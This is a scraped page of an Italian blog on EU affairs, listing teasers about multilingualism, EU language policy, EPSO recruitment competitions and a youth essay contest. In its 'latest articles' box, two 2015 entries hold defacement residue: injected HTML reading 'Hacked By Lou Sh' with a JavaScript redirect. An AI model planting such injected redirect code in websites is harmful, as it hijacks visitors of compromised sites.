EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Multilinguismo

Multilinguismo


Multilinguismo

it

In seguito alla globalizzazione è aumentata per le aziende l'importanza della comunicazione in lingue differenti dalla propria. L'industria della traduzione è quindi un segmento in continua espansione che nel tempo ha determinato la nascita di vere e proprie società o agenzie di traduzione, che offrono gli strumenti necessari per poter operare in maniera competitiva nel contesto internazionale, garantendo una presenza efficace sul mercato globale. Così l'EUATC - European Union of Associations of Translation Companies - ha cominciato ad imporsi sul panorama europeo giocando un ruolo chiave in una serie di iniziative europee.

EUATC è l’organizzazione che coordina le associazioni nazionali delle imprese di traduzione in tutta Europa. Essa lavora e collabora in un’ottica aperta e condivisa, capace di far fronte alle nuove tendenze del settore attraverso uno sguardo attento ai mercati di tutto il mondo. Attraverso l’uso (...)

it

La Corte ha ribadito che tutte le 23 lingue dell’Ue sono ufficiali e ha spiegato che “la limitazione della scelta della seconda lingua di un concorso deve fondarsi su criteri chiari, oggettivi e prevedibili”.

La goccia che ha fatto traboccare il vaso è stata la pubblicazione sulla Gazzetta Ufficiale dell’Unione, nel 2007 da parte dell’Epso (organismo Ue incaricato dell’assunzione e della formazione dei funzionari europei), di alcuni bandi di concorso per amministratori e assistenti nel settore (...)

it

Il Parlamento europeo si concentra sulle lingue e ne sostiene l'apprendimento, è questo il risultato della risoluzione approvata dallo stesso organo dell’Unione. Istruzione prima della scuola,mobilità,cittadinanza attiva e l'intenzione di favorire i giovani nel mondo del lavoro sono i punti focali di questa importante risoluzione.

Il Parlamento europeo torna a sottolineare l’importanza delle lingue per l’inserimento e lo sviluppo dell’individuo singolo nel mondo del lavoro. Questo è quanto si è potuto capire attraverso l’approvazione della risoluzione dell’11 settembre 2012 che punta a sollecitare gli Stati membri ad una (...)

it

La risoluzione del PE riguarda l’istruzione, la formazione e la strategia Europa 2020. Consiste in un quadro strategico per la cooperazione europea nel settore dell’istruzione e della formazione, che prende le mosse dai progressi realizzati nel quadro del programma di lavoro “Istruzione e formazione 2010”.

L’11 settembre 2012 il Parlamento europeo ha approvato una risoluzione che evidenzia l’importanza dell’istruzione e invita le istituzioni UE e gli Stati membri ad agire. Essa istituisce degli obiettivi comuni per tutti gli Stati, incluso un certo numero di misure volte a raggiungere i risultati (...)

it

Gli obiettivi principali sono tre: sensibilizzare il pubblico al plurilinguismo in Europa, coltivare la diversità culturale e linguistica ed incoraggiare uno studio delle lingue esteso per tutta la vita. Lo scopo principale rimane comunque quello di incoraggiare l’apprendimento delle lingue nel vecchio continente.

In occasione della Giornata una serie di eventi verranno organizzati in tutta Europa: eventi per bambini, programmi radio e televisivi, conferenze, spettacoli, corsi di lingua. Quest’anno ad esempio la Commissione europea organizzerà a Roma una giornata sul tema della “Traduzione audiovisiva” – (...)

it

La rappresentanza europea del Regno Unito in particolare ha assunto il controllo delle operazioni, considerando questo come uno step fondamentale verso una maggiore integrazione ed una maggiore conoscenza delle persone che continuamente si spostano tra i vari paesi per questione lavorative o semplicemente per fare dei viaggi turistici. Particolare attenzione è posta verso i social network, i quali tramite la loro continua capacità di divulgazione possono far si che molte persone possano venire attratte da qualcosa che neanche loro sapevano avesse importanza fino a poco tempo prima.

Modificare la politica, trovare un compromesso che possa far coesistere tutti gli appartenenti agli stati membri in maniera ordinata. Questi sono gli obiettivi che un sano cittadino europeo dovrebbe porsi per rendere il proprio continente, il vecchio continente, un luogo migliore. E quale (...)

it

E’ quanto è stato rilevato dall’Indagine Eurobarometro “European Survey on Language Competences”, uno studio della Commissione Europea sulle competenze linguistiche e sull’atteggiamento dei cittadini Ue nei confronti del multilinguismo e dell’apprendimento di lingue straniere.

I cittadini Europei sono diffusamente consapevoli dei vantaggi del multilinguismo: il 72% degli intervistati è d’accordo con la decisione di insegnare almeno due lingue straniere in età precoce e il 77% ritiene che dovrebbe costituire una priorità politica. Più della metà dei cittadini europei usa (...)

it

“Creare il futuro che vogliamo”, questa è la parola d’ordine nonché tema proposto per quest’anno dal Concorso Internazionale di Componimento per i Giovani, organizzato dalla Fondazione Goi Peace e dall’UNESCO. Si tratta di un concorso annuale di componimento rivolto, in via esclusiva, ai giovani di età non superiore ai 25 anni.

Obiettivo di questo concorso è quello di porre la società in ascolto della voce dei giovani, di dare spazio alle loro iniziative per costruire le fondamenta del futuro, di prendere in considerazione le loro aspettative e speranze nonché le loro originali e innovative idee.

Un tema che rispecchia (...)

en
it

To give you an idea of how social media and the digital era have changed our ways, not only to live, but also to die, we will consider the example of the most famous Internet platform of sociality: Facebook. Is it good to keep alive the social life of dead people? Isn’t it painful torture for the people who loved them, making them believe to still have a contact with their beloved ones? Is it a way to accomplish the obsessive curiosity of the other users? Or are we all just profile pages to be filled with advertisements?

The death of one of our relatives or friends always marks our lives, irremediably. It is the worst thing that can happen, to us to accept that someone that we have loved so much and that was so important for our life doesn’t exist anymore. We can search for them, we can go to the places that (...)

it

L’Ufficio Europeo Di Selezione del Personale (EPSO) è l’organo che si occupa, insieme ad una commissione preposta ad esaminare i vari candidati detta commissione giudicatrice, di indire e gestire concorsi per la selezione di personale adatto a ricoprire incarichi all’interno delle varie istituzioni dell’Unione Europea e ha sede a Bruxelles.

Uno degli ultimi concorsi proposti è quello per l’assunzione da Assistenti nel settore del Segretariato (AST1) il cui termine ultimo per candidarsi è fissato per il 20 Dicembre 2011. I posti messi a disposizione sono 257. I candidati ritenuti adatti saranno chiamati a ricoprire posti vacanti (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France